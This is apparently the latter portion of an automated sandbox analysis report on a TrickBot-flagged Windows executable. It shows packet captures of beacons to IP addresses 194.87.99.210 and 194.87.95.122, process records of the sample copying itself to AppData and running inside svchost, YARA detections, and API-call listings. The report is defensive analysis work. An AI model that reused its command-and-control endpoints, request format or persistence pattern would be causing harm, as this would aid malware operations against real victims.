Jan 16, 2025 09:10:55.439097881 CET	443	49713	194.87.99.210	192.168.2.8
Jan 16, 2025 09:10:55.439146042 CET	443	49713	194.87.99.210	192.168.2.8
Jan 16, 2025 09:10:55.439194918 CET	49713	443	192.168.2.8	194.87.99.210
Jan 16, 2025 09:10:55.553175926 CET	49713	443	192.168.2.8	194.87.99.210
Jan 16, 2025 09:10:55.553255081 CET	443	49713	194.87.99.210	192.168.2.8
Jan 16, 2025 09:10:55.554389954 CET	49714	443	192.168.2.8	194.87.99.210
Jan 16, 2025 09:10:55.554425955 CET	443	49714	194.87.99.210	192.168.2.8
Jan 16, 2025 09:10:55.554774046 CET	49714	443	192.168.2.8	194.87.99.210
Jan 16, 2025 09:10:55.554894924 CET	49714	443	192.168.2.8	194.87.99.210
Jan 16, 2025 09:10:55.554903984 CET	443	49714	194.87.99.210	192.168.2.8
Jan 16, 2025 09:10:56.393158913 CET	443	49714	194.87.99.210	192.168.2.8
Jan 16, 2025 09:10:56.394299984 CET	49714	443	192.168.2.8	194.87.99.210
Jan 16, 2025 09:10:56.394324064 CET	443	49714	194.87.99.210	192.168.2.8
Jan 16, 2025 09:10:56.394807100 CET	49714	443	192.168.2.8	194.87.99.210
Jan 16, 2025 09:10:56.394812107 CET	443	49714	194.87.99.210	192.168.2.8
Jan 16, 2025 09:10:56.730360985 CET	443	49714	194.87.99.210	192.168.2.8
Jan 16, 2025 09:10:56.730442047 CET	443	49714	194.87.99.210	192.168.2.8
Jan 16, 2025 09:10:56.730519056 CET	49714	443	192.168.2.8	194.87.99.210
Jan 16, 2025 09:10:56.731654882 CET	49714	443	192.168.2.8	194.87.99.210
Jan 16, 2025 09:10:56.731667042 CET	443	49714	194.87.99.210	192.168.2.8
Jan 16, 2025 09:10:56.732568026 CET	49715	443	192.168.2.8	194.87.95.122
Jan 16, 2025 09:10:56.732675076 CET	443	49715	194.87.95.122	192.168.2.8
Jan 16, 2025 09:10:56.732928991 CET	49715	443	192.168.2.8	194.87.95.122
Jan 16, 2025 09:10:56.733190060 CET	49715	443	192.168.2.8	194.87.95.122
Jan 16, 2025 09:10:56.733226061 CET	443	49715	194.87.95.122	192.168.2.8

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 16, 2025 09:10:53.632669926 CET	56028	53	192.168.2.8	1.1.1.1
Jan 16, 2025 09:10:53.640288115 CET	53	56028	1.1.1.1	192.168.2.8

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 16, 2025 09:10:53.632669926 CET	192.168.2.8	1.1.1.1	0x9978	Standard query (0)	api.ipify.org	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Jan 16, 2025 09:10:53.640288115 CET	1.1.1.1	192.168.2.8	0x9978	No error (0)	api.ipify.org	104.26.12.205	A (IP address)	IN (0x0001)	false
Jan 16, 2025 09:10:53.640288115 CET	1.1.1.1	192.168.2.8	0x9978	No error (0)	api.ipify.org	104.26.13.205	A (IP address)	IN (0x0001)	false
Jan 16, 2025 09:10:53.640288115 CET	1.1.1.1	192.168.2.8	0x9978	No error (0)	api.ipify.org	172.67.74.152	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

194.87.99.210

api.ipify.org

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.8	49712	104.26.12.205	80	5496	C:\Windows\System32\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 16, 2025 09:10:53.650801897 CET	187	OUT	GET / HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36 Host: api.ipify.org
Jan 16, 2025 09:10:54.159845114 CET	430	IN	HTTP/1.1 200 OK Date: Thu, 16 Jan 2025 08:10:54 GMT Content-Type: text/plain Content-Length: 12 Connection: keep-alive Vary: Origin CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 902ca1b808646fc5-IAD server-timing: cfL4;desc="?proto=TCP&rtt=7051&min_rtt=7051&rtt_var=3525&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=187&delivery_rate=0&cwnd=30&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 38 2e 34 36 2e 31 32 33 2e 31 38 39 Data Ascii: 8.46.123.189

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.8	49713	194.87.99.210	443	5496	C:\Windows\System32\svchost.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-16 08:10:55 UTC	248	OUT	GET /mac1/530978_W10019045.DA5B53966FEFB74C898363C3EE618EB5/5/spk/ HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36 Host: 194.87.99.210
2025-01-16 08:10:55 UTC	159	IN	HTTP/1.1 404 Not Found Server: nginx/1.24.0 (Ubuntu) Date: Thu, 16 Jan 2025 08:10:55 GMT Content-Type: text/html Content-Length: 564 Connection: close
2025-01-16 08:10:55 UTC	564	IN	Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.24.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.8	49714	194.87.99.210	443	5496	C:\Windows\System32\svchost.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-16 08:10:56 UTC	248	OUT	GET /mac1/530978_W10019045.DA5B53966FEFB74C898363C3EE618EB5/5/spk/ HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36 Host: 194.87.99.210
2025-01-16 08:10:56 UTC	159	IN	HTTP/1.1 404 Not Found Server: nginx/1.24.0 (Ubuntu) Date: Thu, 16 Jan 2025 08:10:56 GMT Content-Type: text/html Content-Length: 564 Connection: close
2025-01-16 08:10:56 UTC	564	IN	Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.24.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable

Target ID:	0
Start time:	03:09:09
Start date:	16/01/2025
Path:	C:\Users\user\Desktop\55ryoipjfdr.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\55ryoipjfdr.exe"
Imagebase:	0x400000
File size:	396'288 bytes
MD5 hash:	F0B9F50C6A247AC5CA9CC95135B83DCF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	03:09:46
Start date:	16/01/2025
Path:	C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe
Imagebase:	0x400000
File size:	396'288 bytes
MD5 hash:	F0B9F50C6A247AC5CA9CC95135B83DCF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_Trickbot_01365e46, Description: unknown, Source: 00000003.00000002.2121898954.000000000057E000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 95%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	03:10:18
Start date:	16/01/2025
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	svchost.exe -k netsvcs
Imagebase:	0x7ff67e6d0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_Trickbot_01365e46, Description: unknown, Source: 00000006.00000002.2121435304.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_PersistenceViaHiddenTask, Description: Yara detected PersistenceViaHiddenTask, Source: 00000006.00000002.2121935863.000001DD0F013000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	03:10:21
Start date:	16/01/2025
Path:	C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe
Imagebase:	0x400000
File size:	396'288 bytes
MD5 hash:	F0B9F50C6A247AC5CA9CC95135B83DCF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_Trickbot_01365e46, Description: unknown, Source: 00000007.00000002.2462776816.0000000000768000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	03:10:52
Start date:	16/01/2025
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	svchost.exe -k netsvcs
Imagebase:	0x7ff67e6d0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_Trickbot_01365e46, Description: unknown, Source: 00000008.00000002.2670032562.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Author: unknown Rule: Trickbot, Description: detect TrickBot in memory, Source: 00000008.00000002.2671214706.00000159F3602000.00000004.00000020.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_PersistenceViaHiddenTask, Description: Yara detected PersistenceViaHiddenTask, Source: 00000008.00000002.2670443907.00000159F2A13000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Trickbot_1, Description: Yara detected Trickbot, Source: 00000008.00000002.2670443907.00000159F2A13000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Trickbot, Description: detect TrickBot in memory, Source: 00000008.00000002.2670443907.00000159F2A13000.00000004.00000020.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	high
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	23.7%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	29.2%
Total number of Nodes:	120
Total number of Limit Nodes:	3

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 004D007E Relevance: 7.6, APIs: 5, Instructions: 127
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 004D05BD: VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004,004D0093), ref: 004D05CA

VirtualProtect.KERNELBASE(?,?,00000004,?,?), ref: 004D00B3
VirtualProtect.KERNELBASE(?,?,00000002,?,?,?,00000004,?,?), ref: 004D00C3
VirtualProtect.KERNELBASE(?,?,00000004,?,?,?,?,00000000,?,00000000,?,00000002,?,?,?,00000004), ref: 004D010C
VirtualProtect.KERNELBASE(00000004,?,?,?,?,00000000,?,00000000,?,00000002,?,?,?,00000004,?,?), ref: 004D0122
VirtualFree.KERNELBASE(?,00004000,00000002,?,?,?,00000004,?,?), ref: 004D0187

Memory Dump Source

Source File: 00000000.00000002.1797595291.00000000004D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 004D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_55ryoipjfdr.jbxd

Similarity

API ID: Virtual$Protect$AllocFree
String ID:
API String ID: 3729553426-0
Opcode ID: 7cb60aa3ca57c834e55298138eb6fcc60219c6ce3e155163db882c0b84b65934
Instruction ID: 5a17bec7897edf6b976a1ed4efd21f36a2c5e996aa76f4c9021502c72edba047
Opcode Fuzzy Hash: 7cb60aa3ca57c834e55298138eb6fcc60219c6ce3e155163db882c0b84b65934
Instruction Fuzzy Hash: 8B41AF32200114EFDB10EF25D865F6AB7A9EF84728F25411FF9058B312C77AEC02CAA5

Function 004013B7 Relevance: 23.0, APIs: 11, Strings: 2, Instructions: 206
stringsleepprocessCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000005,00000000), ref: 004013E1
lstrcpyW.KERNEL32(?,?), ref: 004013F5
SHGetFolderPathW.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 00401492
lstrcmpiW.KERNEL32(?,?,00000008), ref: 0040156E
CreateDirectoryW.KERNELBASE(?,00000000), ref: 00401584
PathCombineW.SHLWAPI(?,?,?), ref: 0040159F
CopyFileW.KERNELBASE(?,?,00000000), ref: 004015CC
Sleep.KERNELBASE(00001388), ref: 004015DB
CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,00000000,?,?,?), ref: 004015FD
CloseHandle.KERNEL32(?), ref: 0040160A
CloseHandle.KERNEL32(00401697), ref: 00401613

Strings

PsIu, xrefs: 0040159F
7Wu, xrefs: 004015CC

Memory Dump Source

Source File: 00000000.00000002.1797418914.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1797399833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1797439026.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1797470753.0000000000404000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1797485945.0000000000405000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_55ryoipjfdr.jbxd

Similarity

API ID: CloseCreateFileHandlePath$CombineCopyDirectoryFolderModuleNameProcessSleeplstrcmpilstrcpy
String ID: PsIu$7Wu
API String ID: 1270845409-3440933012
Opcode ID: 8b3fec52b528aaaf24680b348fbcd39eeb8659f5e3d30cd4c57e5e12d04ac8df
Instruction ID: 56933cf5b107e2af838ce516cb83aba178c4ca4fb5e82b27baa26dd98f04b199
Opcode Fuzzy Hash: 8b3fec52b528aaaf24680b348fbcd39eeb8659f5e3d30cd4c57e5e12d04ac8df
Instruction Fuzzy Hash: CF7174B2D001199ACB209F64CD84AEFB7B8EB45704F4041BBE645F71B0E7799E84CB59

Function 00401628 Relevance: 7.6, APIs: 5, Instructions: 71
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCommandLineW.KERNEL32 ref: 00401651
CommandLineToArgvW.SHELL32(00000000,004040E4), ref: 0040165D
Sleep.KERNELBASE(000003E8), ref: 0040166D

Part of subcall function 00401302: LoadLibraryA.KERNEL32(00000000,75570BD0,?,00000000,?,00000000,?,00401682,00404010,004030D0), ref: 00401350

Part of subcall function 004018F4: GetNativeSystemInfo.KERNELBASE(?,?,?,?,?,0040168D,00404010,004030D0), ref: 00401907

Part of subcall function 004013B7: GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000005,00000000), ref: 004013E1
Part of subcall function 004013B7: lstrcpyW.KERNEL32(?,?), ref: 004013F5
Part of subcall function 004013B7: SHGetFolderPathW.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 00401492

GetStartupInfoW.KERNEL32(00404098,00000000,00000000,0000000A,?,?,00000005,00404010,004030D0), ref: 004016D3
ExitProcess.KERNEL32 ref: 00401718

Memory Dump Source

Source File: 00000000.00000002.1797418914.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1797399833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1797439026.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1797470753.0000000000404000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1797485945.0000000000405000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_55ryoipjfdr.jbxd

Similarity

API ID: CommandInfoLine$ArgvExitFileFolderLibraryLoadModuleNameNativePathProcessSleepStartupSystemlstrcpy
String ID:
API String ID: 3425523471-0
Opcode ID: 0da129b2474c5623389851489ce034e0666de5b404546f95ef8cdb8554ca5125
Instruction ID: 71d7715d4196c25e6a1be9e88275a335be4e21cd6732a9f9521442d8aa86e98b
Opcode Fuzzy Hash: 0da129b2474c5623389851489ce034e0666de5b404546f95ef8cdb8554ca5125
Instruction Fuzzy Hash: DF2128B6D00204EBEB11AFE1DD46E9EBB78AB84705F00817BB701B21E1EB784655CB58

Function 004D01C0 Relevance: 3.1, APIs: 2, Instructions: 68
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNELBASE(?,?,00000004,?,00000000,?,00000000,?,?,?,00000004,?,?), ref: 004D0201
VirtualProtect.KERNELBASE(?,00000000,?,?,?,00000000,?,?,?,00000004,?,?), ref: 004D023A

Memory Dump Source

Source File: 00000000.00000002.1797595291.00000000004D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 004D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_55ryoipjfdr.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: df0d4710188bbc4545ffb25a3de640365ec90d346391f8a801651d14009fcf39
Instruction ID: 404d1affb8c9295c5f7926d890ff3de656c3597974fdf17a84328c0f58fdb77f
Opcode Fuzzy Hash: df0d4710188bbc4545ffb25a3de640365ec90d346391f8a801651d14009fcf39
Instruction Fuzzy Hash: 9911BC72501210ABEB304E19CC18BBBB7ACEF81720F15465FFC1AE7300D62AED0586A5

Function 004018F4 Relevance: 1.5, APIs: 1, Instructions: 20
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetNativeSystemInfo.KERNELBASE(?,?,?,?,?,0040168D,00404010,004030D0), ref: 00401907

Memory Dump Source

Source File: 00000000.00000002.1797418914.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1797399833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1797439026.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1797470753.0000000000404000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1797485945.0000000000405000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_55ryoipjfdr.jbxd

Similarity

API ID: InfoNativeSystem
String ID:
API String ID: 1721193555-0
Opcode ID: 3734478bb59dad9b5a0ea859872c3a362607ae3d49e81bd9becfad3007244d02
Instruction ID: a2e681556b4012ba0be244234db5ae52ce7a7114cf7b728377cf91826f9dab11
Opcode Fuzzy Hash: 3734478bb59dad9b5a0ea859872c3a362607ae3d49e81bd9becfad3007244d02
Instruction Fuzzy Hash: 9AD05E92A1020546CF24F7F99A1559B73F89788308B0405B9C902F21D0FBB9EEC4C2A8

Function 004C0000 Relevance: 1.3, APIs: 1, Instructions: 48
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,00000688,00001000,00000040), ref: 004C0065

Memory Dump Source

Source File: 00000000.00000002.1797576745.00000000004C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 004C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c0000_55ryoipjfdr.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: a2fcc1d63792b2b86ce2226597d373f45588513d77cf013809a06473fc1d853c
Instruction ID: 188c127560ca22886f4a5d337458b12cb635c04096a0c8dcf2294c023c59bbdb
Opcode Fuzzy Hash: a2fcc1d63792b2b86ce2226597d373f45588513d77cf013809a06473fc1d853c
Instruction Fuzzy Hash: 5B01F779A40304AFDB505F71CC04F8F3AA9AFC8720F42445EF98AA7281CE7C98808A58

Function 004D05BD Relevance: 1.3, APIs: 1, Instructions: 8
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004,004D0093), ref: 004D05CA

Memory Dump Source

Source File: 00000000.00000002.1797595291.00000000004D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 004D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_55ryoipjfdr.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: a9a4fa599d775aa83550951cd01ab53a510ae55495336f8eeb8bc52accc60b48
Instruction ID: 65ce390d9ce214b0b9a70d03eb22b0c205847d94ce1a40b3c250883ace489992
Opcode Fuzzy Hash: a9a4fa599d775aa83550951cd01ab53a510ae55495336f8eeb8bc52accc60b48
Instruction Fuzzy Hash: EAB012B22C038477EB304E614C0EF8A3661ABC8FA3F350000FB106B1C48AF0E8018624

Non-executed Functions

Function 0040197E Relevance: 6.1, APIs: 4, Instructions: 54
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindResourceW.KERNEL32(?,004030D0,00404010,00000005,00000000,?,?,?,004016C0,00000000,00000000,0000000A,?,?,00000005,00404010), ref: 00401995
LoadResource.KERNEL32(?,00000000,?,?,?,004016C0,00000000,00000000,0000000A,?,?,00000005,00404010,004030D0), ref: 004019A5
LockResource.KERNEL32(00000000,?,?,?,004016C0,00000000,00000000,0000000A,?,?,00000005,00404010,004030D0), ref: 004019B0
SizeofResource.KERNEL32(?,00000000,?,?,?,004016C0,00000000,00000000,0000000A,?,?,00000005,00404010,004030D0), ref: 004019C1

Part of subcall function 004021CF: GetProcessHeap.KERNEL32(00000001,00000000,?,?,004012E9,?,00000000), ref: 004021E0
Part of subcall function 004021CF: RtlReAllocateHeap.NTDLL(00000000,?,004012E9,?), ref: 004021E7

Memory Dump Source

Source File: 00000000.00000002.1797418914.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1797399833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1797439026.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1797470753.0000000000404000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1797485945.0000000000405000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_55ryoipjfdr.jbxd

Similarity

API ID: Resource$Heap$AllocateFindLoadLockProcessSizeof
String ID:
API String ID: 1207618237-0
Opcode ID: 82362be20bf79ad3a806fdbf45ede37e26acfe5a6560597d6579467c307b7f7d
Instruction ID: 557254ad5bb932fc15fb17dcc554cf472b057d7683eb25dad1ea30e16e9c6f88
Opcode Fuzzy Hash: 82362be20bf79ad3a806fdbf45ede37e26acfe5a6560597d6579467c307b7f7d
Instruction Fuzzy Hash: 70016DB6500209AFDB116F95DD49C9B7FEDEF85390B014026F904A7261DB75CD10DAA4

Function 00401A00 Relevance: 4.8, APIs: 3, Instructions: 315
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00402217: VirtualAlloc.KERNEL32(?,?,00002000,00000040,?,00401A2C,?,?,00000040), ref: 00402228

GetCurrentProcess.KERNEL32 ref: 00401A5D
LoadLibraryA.KERNEL32(00000000), ref: 00401C34
GetProcAddress.KERNEL32(?,-00000002), ref: 00401C78

Memory Dump Source

Source File: 00000000.00000002.1797418914.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1797399833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1797439026.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1797470753.0000000000404000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1797485945.0000000000405000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_55ryoipjfdr.jbxd

Similarity

API ID: AddressAllocCurrentLibraryLoadProcProcessVirtual
String ID:
API String ID: 1706446071-0
Opcode ID: a757be1230ef48e252645761d69d8fbcfb748e54fb3ffc4dc49cb9433704e5ab
Instruction ID: f4295e59616e0c3e6cd5edc76b93a1a71782363d032a2b2cb433a1441056ac4c
Opcode Fuzzy Hash: a757be1230ef48e252645761d69d8fbcfb748e54fb3ffc4dc49cb9433704e5ab
Instruction Fuzzy Hash: 08C159B290020AAFDB15DFA5C941AAEB7B1FF44304F14843AE905F73A1E738E950CB58

Function 00402200 Relevance: 3.0, APIs: 2, Instructions: 9
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32(00000001,?,?,00401716,?,00404010,004030D0), ref: 00402208
RtlFreeHeap.NTDLL(00000000,?,00401716), ref: 0040220F

Memory Dump Source

Source File: 00000000.00000002.1797418914.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1797399833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1797439026.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1797470753.0000000000404000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1797485945.0000000000405000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_55ryoipjfdr.jbxd

Similarity

API ID: Heap$FreeProcess
String ID:
API String ID: 3859560861-0
Opcode ID: 1ad682c2bc064c6ee563e0fc36cebef234042c1de7907c32db52925004f6e00b
Instruction ID: 3f82cfca929447c2423f285c963da9d02604547df1f6ca588c548235f25897ba
Opcode Fuzzy Hash: 1ad682c2bc064c6ee563e0fc36cebef234042c1de7907c32db52925004f6e00b
Instruction Fuzzy Hash: 97B09B71044208FBDF001FD1ED0D9857F2CD784751F004010F70DA5061C672905057B5

Function 004C007E Relevance: .1, Instructions: 127COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1797576745.00000000004C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 004C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c0000_55ryoipjfdr.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7cb60aa3ca57c834e55298138eb6fcc60219c6ce3e155163db882c0b84b65934
Instruction ID: 4a86277733598b947d8066d824c8b141af3b2c0e47adec0c4fe9157b2c99f2ba
